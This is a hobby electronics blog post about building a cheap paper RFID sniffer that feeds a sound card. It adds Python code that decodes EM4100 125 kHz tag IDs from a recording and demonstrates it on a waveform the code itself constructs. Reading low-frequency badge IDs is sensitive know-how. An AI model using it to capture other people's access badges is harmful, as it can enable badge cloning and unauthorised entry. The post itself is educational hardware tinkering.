To create a paper RFID sniffer, you start by printing the image out on a thick piece of paper, like card stock. You then apply foil tape where indicated to serve as traces in this makeshift PCB, and start soldering on the components as described in the text. [Milosch] says the assembly procedure is so simple even a kid can do it, and the total cost of each assembled sniffer is literally pennies; making this an excellent project for schools or really any large group.

If you want to play it safe, the sniffer can be connected to a cheap USB sound card rather than your machine's primary sound hardware, which keeps the coil's output away from your motherboard's line-in and still comes in dirt cheap. [Milosch] stops short of explaining the software side of things in this particular project, but any tool which can use input from the sound card as a makeshift oscilloscope should be a good start.

In the past we’ve seen [Milosch] perform low frequency RFID sniffing through the sound card with the powerful baudline tool, but if you want a little more capable hardware, we can point you in the right direction.
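Once the waveform is on the sound card, the remaining step is turning it into bits, and that is a small amount of code. The block below is an added example, not part of [Milosch]'s project: the coil and rectifier hand line-in the envelope of the 125 kHz field, so a recording is a slow on/off waveform, and the decoder thresholds it, quantizes the runs into half-bit cells, Manchester-decodes them (trying both cell alignments and both polarities, since a sniffer may invert the envelope) and checks the result against the EM4100 frame layout with its row and column parity. The waveform is constructed with the encoder in the block rather than recorded, and the tag format, bit rate (64 carrier cycles per bit) and 48 kHz sample rate are assumptions stated in the code.

```python
# Added example, not part of Milosch Meriac's project: decoding what the paper
# sniffer delivers to the sound card. The coil plus rectifier hands line-in the
# envelope of the 125 kHz field, so a recording is a slow on/off waveform;
# this turns that into tag bits. The waveform below is constructed with
# encode_samples() rather than recorded; the assumed tag is the common EM4100
# format (Manchester, 64 carrier cycles per bit, about 1953 bit/s) sampled
# at 48 kHz, i.e. roughly 24.6 samples per bit.

import itertools
from typing import List, Optional

SAMPLE_RATE = 48_000
CARRIER_HZ = 125_000
CYCLES_PER_BIT = 64
SAMPLES_PER_BIT = SAMPLE_RATE * CYCLES_PER_BIT / CARRIER_HZ   # 24.576


def em4100_frame(tag_id: int) -> List[int]:
    """64-bit EM4100 frame: 9 header ones, ten 4-bit nibbles each followed by
    an even row-parity bit, four even column-parity bits, and a 0 stop bit."""
    nibbles = [(tag_id >> (4 * (9 - i))) & 0xF for i in range(10)]
    bits = [1] * 9
    for n in nibbles:
        row = [(n >> 3) & 1, (n >> 2) & 1, (n >> 1) & 1, n & 1]
        bits += row + [sum(row) & 1]
    for col in range(4):
        bits.append(sum((n >> (3 - col)) & 1 for n in nibbles) & 1)
    return bits + [0]


def encode_samples(bits: List[int], spb: float = SAMPLES_PER_BIT, repeats: int = 2) -> List[float]:
    """Constructed line-in waveform: Manchester, a 1 is high-then-low, a 0 low-then-high."""
    halves = [h for b in bits * repeats for h in ((1, 0) if b else (0, 1))]
    total = int(len(halves) * spb / 2)
    return [0.9 if halves[int(i / (spb / 2))] else 0.1 for i in range(total)]


def half_cells(samples: List[float], spb: float) -> List[int]:
    """Threshold at the midpoint, then quantise each constant run to whole half-bit cells."""
    thr = (max(samples) + min(samples)) / 2
    levels = [1 if s > thr else 0 for s in samples]
    cells: List[int] = []
    for level, group in itertools.groupby(levels):
        cells += [level] * max(1, round(len(list(group)) / (spb / 2)))
    return cells


def manchester_decode(cells: List[int]) -> List[List[int]]:
    """Bit streams for both possible cell alignments. Two equal half-cells in
    one bit are not valid Manchester, so the wrong alignment dies early and the
    EM4100 parity checks pick the survivor."""
    streams = []
    for phase in (0, 1):
        bits = []
        for i in range(phase, len(cells) - 1, 2):
            if cells[i] == cells[i + 1]:
                break
            bits.append(cells[i])
        streams.append(bits)
    return streams


def parse_em4100(bits: List[int]) -> Optional[int]:
    """Find a frame whose header, row parities, column parities and stop bit all check."""
    for start in range(len(bits) - 63):
        frame = bits[start:start + 64]
        if frame[:9] != [1] * 9 or frame[63] != 0:
            continue
        rows = [frame[9 + 5 * r:14 + 5 * r] for r in range(10)]
        if any(sum(row) & 1 for row in rows):
            continue
        if any((sum(row[c] for row in rows) & 1) != frame[59 + c] for c in range(4)):
            continue
        tag_id = 0
        for row in rows:
            for b in row[:4]:
                tag_id = (tag_id << 1) | b
        return tag_id
    return None


def decode_capture(samples: List[float], spb: float = SAMPLES_PER_BIT) -> Optional[int]:
    """Try both alignments and both polarities (a sniffer may invert the envelope)."""
    cells = half_cells(samples, spb)
    for stream in manchester_decode(cells) + manchester_decode([1 - c for c in cells]):
        tag_id = parse_em4100(stream)
        if tag_id is not None:
            return tag_id
    return None


SAMPLE_TAG_ID = 0x3A5C9B1E7D                      # constructed 40-bit ID
SAMPLE_CAPTURE = encode_samples(em4100_frame(SAMPLE_TAG_ID))

if __name__ == "__main__":
    print(f"{decode_capture(SAMPLE_CAPTURE):010X}")
```

With a real recording, the samples list is the mono channel of the WAV and the only tuning is the samples-per-bit figure, which follows from the card's sample rate and the tag's bit rate; the parity checks are what make the decoder self-correcting about alignment and polarity rather than something you have to eyeball.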